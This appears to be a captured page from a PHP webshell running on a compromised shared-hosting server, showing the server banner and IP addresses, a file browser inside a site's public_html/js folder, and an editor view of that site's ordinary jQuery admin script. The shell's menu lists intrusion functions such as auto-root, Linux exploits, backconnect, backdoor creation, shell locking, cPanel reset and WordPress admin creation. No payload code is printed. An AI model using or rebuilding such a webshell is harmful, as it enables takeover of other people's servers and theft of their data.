Linux p3plzcpnl507038.prod.phx3.secureserver.net 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
Apache
: 107.180.60.7 | : 216.73.217.35
Cant Read [ /etc/named.conf ]
8.2.33
xq1lly2rxbs0
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
xq1lly2rxbs0 /
public_html /
public /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
profile
[ DIR ]
drwxr-xr-x
ajax.js
13.37
KB
-rw-r--r--
custom.js
16.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ajax.js
$('.VerifyUser').click(function (e) { e.preventDefault(); var trid = $(this).closest('tr').attr('id'); Swal.fire({ title: "Are you sure?", text: "You want to verify the user?!", icon: "warning", showCancelButton: true, confirmButtonText: "Yes, sure!", allowOutsideClick: false }).then(function (result) { if (result.value) { $.ajax({ type: "GET", url: base_url + "/admin/Ajax/VerifyUser", data: { 'id': trid }, dataType: "json", success: function (response) { if (response.status == true) { Swal.fire({ title: "Done", text: response.msg, icon: "success", confirmButtonText: "Ok", confirmButtonColor: "#50cd89", allowOutsideClick: false }).then(function (result) { location.reload(); }); } else { Swal.fire("Error!", response.msg, "error"); } } }); } }); }); function LangIdClick(langId) { var language = $("input[name='parent_id']").val(''); console.log(language); $.ajax({ type: "GET", url: base_url + "/admin/ajax/languages", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#parent_id").html(''); $("#parent_id").html('<option value="0">Parent Menu</option>'); response.data.forEach(element => { $("#parent_id").append('<option value="' + element.id + '">' + element.title + '</option>'); }); } }); } $('input[name="lang_id"]').on("click", function () { var langId = $(this).val(); LangIdClick(langId); }); //footer email $('#FormEmail').on('submit', function (e) { e.preventDefault(); // alert('hello'); $.ajaxSetup({ headers: { 'X-CSRF-TOKEN': $('meta[name="csrf-token"]').attr('content') } }); $.ajax({ url: base_url + "/subscribe", type: 'post', data: $('#FormEmail').serialize(), dataType: 'json', success: function (response) { swal({ text: response.msg, button: response.button }); $('#FormEmail')[0].reset(); // $('#message').html(response.success); // $("#message").css("background-color","SkyBlue"); // $("#message").width("200px"); } }); }); //medical-supplies-detailproduct function LangIdCategory(langId) { var language = $("input[name='product_category_id']").val(''); var supplierlanguage = $("input[name='supplier_id']").val(''); var divisionlanguage = $("input[name='division_id']").val(''); console.log(language, supplierlanguage, divisionlanguage); $.ajax({ type: "GET", url: base_url + "/admin/ajax/product-category", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#product_category_id").html(''); $("#product_category_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#product_category_id").append('<option value="' + element.id + '">' + element.category_title + '</option>'); }); } }); $.ajax({ type: "GET", url: base_url + "/admin/ajax/supplier", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#supplier_id").html(''); $("#supplier_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#supplier_id").append('<option value="' + element.id + '">' + element.supplier_title + '</option>'); }); } }); $.ajax({ type: "GET", url: base_url + "/admin/ajax/division", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#division_id").html(''); $("#division_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#division_id").append('<option value="' + element.id + '">' + element.species_title + '</option>'); }); } }); } $('input[name="lang_id"]').on("click", function () { var langId = $(this).val(); LangIdCategory(langId); }); //equipmentController function LangIdEquipment(langId) { var language = $("input[name='product_id']").val(''); var companyid = $("input[name='company_id']").val(''); var equipmentbenefits = $("input[name='equipment_benefits_id']").val(''); var ourteam = $("input[name='our_team_id']").val(''); console.log(language, companyid, equipmentbenefits, ourteam); $.ajax({ type: "GET", url: base_url + "/admin/ajax/equipment-product", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#product_id").html(''); $("#product_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#product_id").append('<option value="' + element.id + '">' + element.product_name + '</option>'); }); } }); $.ajax({ type: "GET", url: base_url + "/admin/ajax/equipment-company", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#company_id").html(''); $("#company_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#company_id").append('<option value="' + element.id + '">' + element.company_name + '</option>'); }); } }); $.ajax({ type: "GET", url: base_url + "/admin/ajax/equipment-benefits", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#equipment_benefits_id").html(''); $("#equipment_benefits_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#equipment_benefits_id").append('<option value="' + element.id + '">' + element.title + '</option>'); }); } }); $.ajax({ type: "GET", url: base_url + "/admin/ajax/equipment-ourteam", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#our_team_id").html(''); $("#our_team_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#our_team_id").append('<option value="' + element.id + '">' + element.first_name + ' ' + element.last_name + '</option>'); }); } }); } $('input[name="lang_id"]').on("click", function () { var langId = $(this).val(); LangIdEquipment(langId); }); //veterinary-detailproduct function LangIdVeterinary(langId) { var language = $("input[name='product_category_id']").val(''); var supplierlanguage = $("input[name='supplier_id']").val(''); var specieslanguage = $("input[name='species_id']").val(''); console.log(language, supplierlanguage, specieslanguage); $.ajax({ type: "GET", url: base_url + "/admin/ajax/veterinary-category", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#product_category_id").html(''); $("#product_category_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#product_category_id").append('<option value="' + element.id + '">' + element.category_title + '</option>'); }); } }); $.ajax({ type: "GET", url: base_url + "/admin/ajax/veterinary-supplier", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#supplier_id").html(''); $("#supplier_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#supplier_id").append('<option value="' + element.id + '">' + element.supplier_title + '</option>'); }); } }); $.ajax({ type: "GET", url: base_url + "/admin/ajax/veterinary-division", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#species_id").html(''); $("#species_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#species_id").append('<option value="' + element.id + '">' + element.species_title + '</option>'); }); } }); } $('input[name="lang_id"]').on("click", function () { var langId = $(this).val(); LangIdVeterinary(langId); }); //Human Resources Form $('.FormHumanR').on('submit', function (e) { e.preventDefault(); var isValid = true; $('.FormHumanR [required]').each(function () { if (!$(this).val()) { isValid = false; } }); if (!isValid) { return; } var formData = new FormData(this); $.ajax({ url: base_url + "/human-resources-form", type: 'post', data: formData, contentType: false, processData: false, dataType: 'json', success: function (response) { swal({ text: response.msg, button: response.button }); $('.FormHumanR')[0].reset(); }, error: function (xhr, status, error) { console.error(xhr.responseText); } }); }); function clearAndReload() { location.reload(); } $(document).ready(function () { $('input[name="lang_id"]').on("click", function () { var langId = $(this).val(); getCategory(langId); }); // console.log(langId); function getCategory(langId) { $.ajax({ type: "GET", url: base_url + "/admin/ajax/get-category", data: { 'langId': langId }, dataType: "json", success: function (response) { console.log(response); $("#categoryID").html(''); $("#categoryID").html('<option value="">--Select N&B Category--</option>'); response.data.forEach(element => { $("#categoryID").append('<option value="' + element.id + '">' + element.catTitle + '</option>'); }); } }); } }); //medical-supplier function DisplayBylang(langId) { var language = $("input[name='category_id']").val(''); var supplierlanguage = $("input[name='equiment_supplier_id']").val(''); $.ajax({ type: "GET", url: base_url + "/admin/Ajax/equipment-category", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#category_id").html(''); $("#category_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#category_id").append('<option value="' + element.id + '">' + element.category_title + '</option>'); }); } }); $.ajax({ type: "GET", url: base_url + "/admin/Ajax/equipment-supplier", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#equiment_supplier_id").html(''); $("#equiment_supplier_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#equiment_supplier_id").append('<option value="' + element.id + '">' + element.supplier_title + '</option>'); }); } }); $.ajax({ type: "GET", url: base_url + "/admin/Ajax/equipment-products", data: { 'langId': langId }, dataType: "json", success: function (response) { $("#equipments_products_id").html(''); $("#equipments_products_id").html('<option value="">--Select Option--</option>'); response.data.forEach(element => { $("#equipments_products_id").append('<option value="' + element.slug + '">' + element.product_name + '</option>'); }); } }); }
Close